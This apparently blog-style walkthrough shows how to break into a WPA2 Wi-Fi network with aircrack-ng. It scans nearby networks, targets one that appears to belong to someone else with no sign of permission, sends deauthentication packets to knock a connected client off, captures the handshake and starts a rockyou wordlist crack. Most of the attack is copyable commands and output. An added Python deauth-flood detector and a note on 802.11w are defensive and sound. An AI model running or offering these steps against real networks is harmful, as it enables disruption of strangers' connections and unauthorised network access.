Starting a USB wireless interface in monitor mode.
┌─[root@parrot]─[/home/jason]
└──╼ #airmon-ng start wlan1

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  593 NetworkManager
  749 wpa_supplicant
  923 dhclient

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k           Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy1    wlan1           rt73usb         Belkin Components F5D7050 Wireless G Adapter v3000 [Ralink RT2571W]

                (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
                (mac80211 station mode vif disabled for [phy1]wlan1)
Now we need to list all wireless networks to find the one we wish to attack.
┌─[root@parrot]─[/home/jason/Documents]
└──╼ #airodump-ng wlan1mon
I got this output.
 CH 11 ][ Elapsed: 54 s ][ 2017-08-24 08:13

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:25:00:FF:94:73   -1        0        0    0  -1  -1                    <length:  0>
 E0:B9:E5:B8:31:BB  -39       30        0    0  11  54e  WPA2 CCMP   PSK  OPTUSVD3AEDEA
 E0:B9:E5:6E:D3:69  -77       29        0    0   6  54e  WPA2 CCMP   PSK  Telstra6ED369
 F4:6B:EF:B8:E9:27  -78       17        0    0  11  54e  WPA2 CCMP   PSK  OPTUS_B8E926
 FA:AB:05:CF:98:E2  -85        2        0    0   6  54e  OPN              Telstra Air

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 00:25:00:FF:94:73  82:FC:02:C5:6D:52  -79    0 -12      0       10
 F4:6B:EF:B8:E9:27  A0:2C:36:E3:CD:C1  -81    0 - 1      0        8
 F4:6B:EF:B8:E9:27  F0:C7:7F:78:19:D5  -83    0 - 1      0        1
Select the MAC address (BSSID) of the target access point, lock airodump-ng to its channel, and write the capture to a file; then we are ready to begin attacking the access point.
┌─[root@parrot]─[/home/user]
└──╼ #airodump-ng --bssid E0:B9:E5:6E:D3:69 -c 6 --write password wlan1mon
 CH  6 ][ Elapsed: 5 mins ][ 2017-08-24 08:20 ][ WPA handshake: E0:B9:E5:6E:D3:69

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 E0:B9:E5:6E:D3:69  -77 100     2540      137    0   6  54e  WPA2 CCMP   PSK  Telstra6ED369

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 E0:B9:E5:6E:D3:69  68:64:4B:2A:10:18  -83   2e- 1      0     1600
There are clients on the wireless network, so we can help the attack along by kicking one of them off.
Send a deauth from a separate terminal window to a wireless client to disconnect it; when it reconnects, the WPA handshake is captured.
┌─[root@parrot]─[/home/jason]
└──╼ #aireplay-ng -0 6 -a E0:B9:E5:6E:D3:69 -c 68:64:4B:2A:10:18 wlan1mon
08:19:14  Waiting for beacon frame (BSSID: E0:B9:E5:6E:D3:69) on channel 6
08:19:14  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [42|34 ACKs]
08:19:15  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [31|35 ACKs]
08:19:16  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [29|35 ACKs]
08:19:16  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [25|39 ACKs]
08:19:17  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [25|38 ACKs]
08:19:17  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [22|23 ACKs]
The attack in this case was a success. I managed to capture a wireless network handshake by sending deauth packets to the client.
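From the defender's side, a burst like the one above is easy to spot in a monitor-mode capture. The Python below is an added example (not part of the original post) that parses raw 802.11 management frames and flags a deauthentication flood against a (BSSID, station) pair; the frame bytes, addresses and thresholds are constructed here for the demonstration.

```python
import struct
from collections import defaultdict, deque

DEAUTH_SUBTYPE = 12     # 802.11 management frame (type 0), subtype 12 = Deauthentication
DISASSOC_SUBTYPE = 10   # subtype 10 = Disassociation, abused the same way

def _mac(b: bytes) -> str:
    return ":".join(f"{x:02X}" for x in b)

def parse_mgmt_frame(frame: bytes):
    """Return (subtype, addr1, addr2, addr3, reason) for a management frame, else None.
    addr1 = receiver, addr2 = transmitter, addr3 = BSSID in a management frame."""
    if len(frame) < 24:
        return None
    fc = frame[0]                       # frame control: bits 2-3 type, bits 4-7 subtype
    if (fc >> 2) & 0x3 != 0:            # not a management frame
        return None
    subtype = (fc >> 4) & 0xF
    reason = None
    if subtype in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]   # 2-byte little-endian reason code
    return subtype, _mac(frame[4:10]), _mac(frame[10:16]), _mac(frame[16:22]), reason

def detect_deauth_floods(frames, window_s=2.0, threshold=10):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes).
    Returns [(bssid, station, peak_count)] for pairs that exceeded `threshold`
    deauth/disassoc frames inside any sliding window of `window_s` seconds."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, raw in frames:
        parsed = parse_mgmt_frame(raw)
        if not parsed or parsed[0] not in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
            continue
        _, dst, _src, bssid, _reason = parsed
        q = recent[(bssid, dst)]
        q.append(ts)
        while q and ts - q[0] > window_s:     # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            alerts[(bssid, dst)] = max(alerts.get((bssid, dst), 0), len(q))
    return [(b, s, n) for (b, s), n in alerts.items()]

def build_deauth(bssid: str, station: str, reason: int = 7) -> bytes:
    """Constructed deauth frame: FC 0xC0 0x00, duration, addr1=station, addr2=addr3=bssid, seq, reason."""
    m = lambda s: bytes.fromhex(s.replace(":", ""))
    return b"\xc0\x00\x3a\x01" + m(station) + m(bssid) + m(bssid) + b"\x00\x00" + struct.pack("<H", reason)

# Constructed capture: one beacon, then 64 deauths to a single client within ~0.6 s (a hypothetical AP/client pair).
AP, STA = "E0:B9:E5:6E:D3:69", "68:64:4B:2A:10:18"
SAMPLE = [(0.0, b"\x80\x00\x00\x00" + b"\xff" * 6 + bytes.fromhex(AP.replace(":", "")) * 2 + b"\x00\x00")]
SAMPLE += [(0.5 + i * 0.01, build_deauth(AP, STA)) for i in range(64)]

if __name__ == "__main__":
    print(detect_deauth_floods(SAMPLE))   # [('E0:B9:E5:6E:D3:69', '68:64:4B:2A:10:18', 64)]
```

Enabling 802.11w (Protected Management Frames) on the access point is the configuration fix: clients then discard unauthenticated deauth and disassoc frames, so this flood no longer disconnects them.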
Now I am trying to crack the wireless Pre-Shared Key with a wordlist.
┌─[root@parrot]─[/home/jason]
└──╼ #aircrack-ng password-01.cap -w rockyou.txt
This is what it looks like, but the passphrase needs to be in the wordlist for it to crack.
                                 Aircrack-ng 1.2 rc4

      [00:00:27] 45676/9822768 keys tested (1715.21 k/s)

      Time left: 1 hour, 35 minutes, 0 seconds                   0.47%

                       Current passphrase: lovinhim1

      Master Key     : 0F EE 18 DC 93 8B 08 17 41 A8 12 31 DD 43 77 37
                       A3 C1 87 09 9E A2 CC 80 56 F8 EF 91 B5 0E 51 04

      Transient Key  : A5 32 F4 A1 C6 66 29 42 BB E8 D3 98 9E A3 09 80
                       65 31 31 05 19 DF A8 23 5D 07 B4 93 89 27 2B 0A
                       F2 4A 74 BA 89 D8 AA 0D EF 00 9F FE 72 B3 FB CA
                       B2 3A 31 D3 95 36 54 BC A5 FC 16 E9 4B A0 29 41

      EAPOL HMAC     : 4D 0F 42 12 7C 68 3D 12 F3 A0 67 98 F3 33 19 39
This attack works once a client has been successfully kicked off the network: the client reconnects, and the handshake is captured to the file automatically. It is an effective way to crack a wireless network, but the hard part is cracking the Pre-Shared Key, which requires a massive wordlist to run against the captured handshake. Once you have a suitable collection of rainbow tables and wordlists, the Pre-Shared Key can be cracked.